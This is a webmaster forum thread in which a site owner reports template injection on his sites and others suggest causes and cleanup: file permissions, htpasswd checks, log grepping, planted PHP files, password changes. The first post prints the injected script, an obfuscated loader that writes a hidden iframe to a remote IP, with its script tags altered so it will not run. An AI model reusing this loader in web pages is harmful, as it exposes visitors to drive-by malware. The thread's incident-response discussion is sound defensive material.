We need to talk SECURITY!!! NOW!!

[The Professional]

So I wake up this morning.... give my eyes a wipe and stumble over to my desktop only to find that all 6 of my live sites have been hacked. The hacker placed javascript code in all the mainpage templates that ST uses... and also place code in the toplists that EPT uses on 4 of the sites (I had already made my ATX toplists chmod 444 from the last hack)

So WTF is the deal here boys. Make me understand why I just had to take his fucking code out of all my sites... and chmod every template I have to 444 so that even when I want to overwrite it I have to ftp in and change it first?

ST is a common script between all sites... as is Linkex

I'm getting sick and fucking tired or this bullshit! I've been waking up to my sites being hacked for a month now it seems.

The script looks something like this: (I've edit the tags to make sure it doesn't run)

<//script//> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); <//script//>

any guru's that can help I would greatly apprecaite it. I wanna find out who this fucker is and hang him by his balls..... just like the good old days where you would img src the shit out of whoever fucked you over... it's time this business become self regulating again.

[FrozenJag]

Just a suggestion. Make your sites a little less know in the public.

Might help, but might not. Couldnt hurt is what im saying.

[Jakke PNG]

Just a suggestion. Make your sites a little less know in the public.

Might help, but might not. Couldnt hurt is what im saying.

Heheheh.. I thought the ENTIRE business model is to make your site as known to the public as possible?

[Therapy]

12 months in the future.........Daily Traffic 1 (hit) (yes that was me) But I never got hacked.

On a serious note, Sorry to hear it happen again, going to 444 all my templates now and change passwords again.

[JACOBKELL]

Just a suggestion. Make your sites a little less know in the public.

Might help, but might not. Couldnt hurt is what im saying.

Actualy i would dare to say it's better to make site more public especialy in webmaster community beacuse then other webmasters can see errors which maybe you missed.

[FrozenJag]

Heheheh.. I thought the ENTIRE business model is to make your site as known to the public as possible?

Your talking paysites I assume?

I was talking tgp/mgp.

And by "public" I meant boards and shit. Not the average surfer.

[FrozenJag]

Actualy i would dare to say it's better to make site more public especialy in webmaster community beacuse then other webmasters can see errors which maybe you missed.

Im just saying I know for a fact that many cheaters and other people up to no good scan adx and other boards daily.

If somebody is looking for a site to experiment on wouldnt you think it would be easiest to hit a random post, pull up the site in somebodies sig, and fuck with it?

I see your point aswell though, thats why I would hit up a few buddies and have them check things out for me.

[Jakke PNG]

Your talking paysites I assume?

I was talking tgp/mgp.

So am I. You're trying to keep your free sites so nobody knows about them?
How are you making money off those? I know MY goal with my free sites is to get as many people visiting those as I can.

[Jakke PNG]

Ahh. You mean don't let other webmasters know what sites you run?

[FrozenJag]

Ahh. You mean don't let other webmasters know what sites you run?

Yeah, mainly cheaters.

I have a webmaster page where other webmasters can find it through them surfing my site from another trade, etc.

But if I flew my webmaster page in my sig it would then become and easy target for cheaters/hackers to fuck with.
I just dont like taking the chance and I know others have to agree.

I wasnt meaning to bash anyone or anything. Its just how I do things.

[The Professional]

Just as an update.... my host (Spudstr over at yellowfiber) says nobody got in through ftp or ssh...

can anyone clarify for me any other methods that someone could use to get my passwords to the scripts? I dont' know how else they could change the templates?

I understand your guys point about the publicity... I've removed my sites from my sig... espeically at gfy

[rowan]

Are you on a managed box?

Is your OS, Apache, PHP etc upgraded to the latest version?

Are you using a control panel which may also need to be upgraded?

What other third party scripts exist on this box? If you've had it for a while, think back to scripts that you may not use any more, but are still located on the server.

[Fuckin Bill]

Just as an update.... my host (Spudstr over at yellowfiber) says nobody got in through ftp or ssh...

can anyone clarify for me any other methods that someone could use to get my passwords to the scripts? I dont' know how else they could change the templates?

I understand your guys point about the publicity... I've removed my sites from my sig... espeically at gfy

My guess is that they slipped another php file in somewhere and they're using it to edit files.

Also check all your password files on the server. ST uses htaccess and htpasswd. Look at the htpasswd in a text editor, there should be only 1 user and password there, YOU. If there's anything else, delete it. Check any other script that sets passwords the same way. Just because the script doesn't show another user doesn't mean that file wasn't edited.

If you know how to use grep, check your logs for the filename that was modified. If they used a script to modify it, there will probably be a query string in your logs somewhere with like ?file=toplisttemplate.html Try searching the logs for "=" and the name of your templates, you might find what they used to modify it.

[rowan]

My guess is that they slipped another php file in somewhere and they're using it to edit files.

grepping the access log for the string "POST /" may also help provide some initial clues - if their script uses a POST form to command it then it should show up. (Note that legitimate scripts such as AT and ST may also show here, just disregard entries with your own IP)

It may also be possible to write a script to figure out objects that are fetched by a very small number of IPs (ie not surfers)

[Therapy]

ST and ATX have a 'file check' option, this will find any suspicious files in the script's install directories.

[JD]

change ALL passwords on that box. atx/st/ssh/ftp/etc everything.

worked for me when my hosts weren't able to figure it out :/

[Papillon]

Uggg sorry to hear this.

Let us know if you uncover anything suspicious.

[steveo]

Being someone who trades with you I'm curious as well what you uncover! Be sure to keep us all updated. And sorry to hear it happened to you man.

[The Professional]

I will keep you guys posted for sure.... still looking into things.... I will post my findings

[CastleOfXXX]

mine was index.php , which overrides my index.shtml the hacker added this file and used it to update my template to whatever they wanted.i use ST and Sloth and both i am sure are fully secure this is some other way of getting in.Change all passwords as advised , and best of luck !